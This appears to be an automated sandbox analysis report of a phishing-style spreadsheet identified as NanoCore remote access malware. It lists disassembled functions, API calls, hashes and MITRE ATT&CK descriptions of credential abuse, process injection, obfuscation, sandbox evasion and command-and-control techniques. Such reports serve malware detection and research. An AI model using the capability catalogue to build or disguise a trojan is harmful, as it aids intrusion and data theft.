Instruction ID: d8edf906874b6c2d1f96c27194496bfeb8c7260fb5e8f9188f7f635b7a0c25d0
Opcode Fuzzy Hash: 8555fb6e8268aef61edcba8df19f77b50e00c23730a82c77b9b5dca5884b6ecb
Instruction Fuzzy Hash: FF417A75E0020D9FCB14CF99D880AEEB7B5FF48710F14816AEA09AB355D7716902DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FBF540, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00FBF548

Part of subcall function 00FBF570: _memmove.LIBCMT ref: 00FBF5B9

Part of subcall function 00FBF570: _memmove.LIBCMT ref: 00FBF5D3

_sprintf.LIBCMT ref: 00FBF69E

Strings

%02X, xrefs: 00FBF698

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$_sprintf_strlen
String ID: %02X
API String ID: 1921645428-436463671
Opcode ID: ce08bd5e0421b3e68966c5d08023ea6200e231bf3064620595499f06d59bd058
Instruction ID: fcb9326f7cd45756069eadffb1815dfb15137bb364e59171bdd949701c23ac21
Opcode Fuzzy Hash: ce08bd5e0421b3e68966c5d08023ea6200e231bf3064620595499f06d59bd058
Instruction Fuzzy Hash: 2221F872B0021437D714A66DCC83FDAB39DEF40700F14407AF941E7241EE69AA0997B5

Uniqueness

Uniqueness Score: -1.00%

Function 01001297, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32 ref: 010012C0
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010012D0

Strings

edit, xrefs: 01001338

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 06e5f22ee0d79d138e700c691038e68c051c274d5a248c41669bfe1a23107c2f
Instruction ID: 3fb1803f2f1842f2f037829bd89a2bb1f9e689439a93c621f542fb13d30ecc85
Opcode Fuzzy Hash: 06e5f22ee0d79d138e700c691038e68c051c274d5a248c41669bfe1a23107c2f
Instruction Fuzzy Hash: 7E2175B2504204ABEB219E6DDC84EEB33ADEB89334F104319FAA4D72C1C675D8918B60

Uniqueness

Uniqueness Score: -1.00%

Function 00FBF570, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FBF5B9
_memmove.LIBCMT ref: 00FBF5D3

Strings

?T, xrefs: 00FD6511

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: ?T
API String ID: 4104443479-3504941901
Opcode ID: 6ed6293c3fc55fbf7b4a0a22f5e05766082ab94377e9ba98b933d083143e9cd3
Instruction ID: c31be55674a6202c70462044ff3c15daaf5e1052b260812415fdff47fb7fcf3e
Opcode Fuzzy Hash: 6ed6293c3fc55fbf7b4a0a22f5e05766082ab94377e9ba98b933d083143e9cd3
Instruction Fuzzy Hash: B711B1B251011AAFC704DF69DCC1EEE73A9AB04344B544169EA06C7601EB35FA19EBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00FF24F3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00FF257F

Strings

<local>, xrefs: 00FF253E

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: InternetOpen
String ID: <local>
API String ID: 2038078732-4266983199
Opcode ID: c146a256e09176f8fb7347dd2ea38e90b9db490b4d9a6826eb61e22c8a887c43
Instruction ID: 3d8d310d52e49bc529b785fd29d04626d5ea6819f1790574f541f514b72ec00a
Opcode Fuzzy Hash: c146a256e09176f8fb7347dd2ea38e90b9db490b4d9a6826eb61e22c8a887c43
Instruction Fuzzy Hash: 9A11E971A80318ABE770CA508C66FBA77A8FF15710F28404AFA82AB5D0D7B5B944E751

Uniqueness

Uniqueness Score: -1.00%

Function 0101907F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FB1D10: _wcslen.LIBCMT ref: 00FB1D11
Part of subcall function 00FB1D10: _memmove.LIBCMT ref: 00FB1D57

SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 010190EB

Strings

ListBox, xrefs: 010190B6
ComboBox, xrefs: 0101908B

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend_memmove_wcslen
String ID: ComboBox$ListBox
API String ID: 547829025-1403004172
Opcode ID: 73162d5b346f311939dd89d1c9eb67a7752842c2965c432ae990b01d25e11e3f
Instruction ID: 445bb3bbb35bab2b08c2732be9f42a3fec11fe65d50f7b12ccabe5249ffaa763
Opcode Fuzzy Hash: 73162d5b346f311939dd89d1c9eb67a7752842c2965c432ae990b01d25e11e3f
Instruction Fuzzy Hash: 99012831B101197BDB10FAAEDC45BDFBB9CAF56320F04805BFA489B247C9399A5483E0

Uniqueness

Uniqueness Score: -1.00%

Function 00FE2175, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FE2192
__fread_nolock.LIBCMT ref: 00FE21A8

Strings

EA06, xrefs: 00FE21DB

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: ccd5e620147e2fab1ff637644f98ea84461e32b0c12b09ffc72ad49871976043
Instruction ID: 3ed52cc7d2a32d59ce92c51c60b13c970de7f18f9a3c419407d7514886adb40e
Opcode Fuzzy Hash: ccd5e620147e2fab1ff637644f98ea84461e32b0c12b09ffc72ad49871976043
Instruction Fuzzy Hash: EB014931C04258ABCB28CB998C16FEEBBF89F45301F00859EF59792281E578A718D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01006069, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001001,00000000,?), ref: 01006075

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

wsprintfW.USER32 ref: 010060A1

Strings

%d/%02d/%02d, xrefs: 0100609B

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend_mallocwsprintf
String ID: %d/%02d/%02d
API String ID: 1262938277-328681919
Opcode ID: 7aaae401174ab43a66ebb85ff83a71eef7e214f2a8d590aeeab05464a204f31d
Instruction ID: a9d6b83fff18011bf64c9333972abf666954b16ea2cbb01083b9993e6b268d3e
Opcode Fuzzy Hash: 7aaae401174ab43a66ebb85ff83a71eef7e214f2a8d590aeeab05464a204f31d
Instruction Fuzzy Hash: 5DF0823274022466E7209BD9AD42FBEB3ECEB4AB13F00016BFA44E91C0D66A4950D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE704A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00FE7058

Part of subcall function 00FC17FA: _doexit.LIBCMT ref: 00FC1806

Strings

Error allocating memory., xrefs: 00FE7051
AutoIt, xrefs: 00FE704C

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: f569e3588b9f45cb77c54036ed1cf0d9554a8064d15d4536c248fb6fd12a270b
Instruction ID: c65bec27a75d6b7898ecac9fc2bb05709e99df689ea02276e10c4a9dc6104837
Opcode Fuzzy Hash: f569e3588b9f45cb77c54036ed1cf0d9554a8064d15d4536c248fb6fd12a270b
Instruction Fuzzy Hash: E0B012323C830537E51426A24E0BF4630081F48F0AF00040CB3D5AC1C304D6046062B1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Import order764536.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

Exploits:

E-Banking Fraud:

System Summary:

Stealing of Sensitive Information:

Remote Access Functionality:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Function 0027CBB8, Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 199
filesleeptimeCOMMON

Function 0027963A, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 92
memorywindowCOMMON

Function 0026A2DF, Relevance: 7.6, APIs: 5, Instructions: 108
fileCOMMON

Function 00286AF3, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Function 002683C0, Relevance: 3.9, APIs: 2, Instructions: 940
COMMONCrypto

Function 0027E643, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Function 0027A5D1, Relevance: 100.5, APIs: 47, Strings: 10, Instructions: 724
COMMON

Function 0026FD49, Relevance: 100.1, APIs: 22, Strings: 35, Instructions: 314
libraryfileloaderCOMMON

Function 0027B4C7, Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438
windowfileCOMMON

Function 0026CFD0, Relevance: 30.3, APIs: 4, Strings: 13, Instructions: 557
COMMON

Function 0027C190, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Function 0027C431, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Function 002895A5, Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Function 00269768, Relevance: 7.6, APIs: 5, Instructions: 116
filetimeCOMMON

Function 0027A388, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Function 00279A32, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Function 00279AA0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
comCOMMON

Function 0027C891, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Function 0026964A, Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Function 00289A2C, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Function 002704F5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
threadCOMMON

Function 00269C34, Relevance: 4.6, APIs: 3, Instructions: 96
fileCOMMON

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre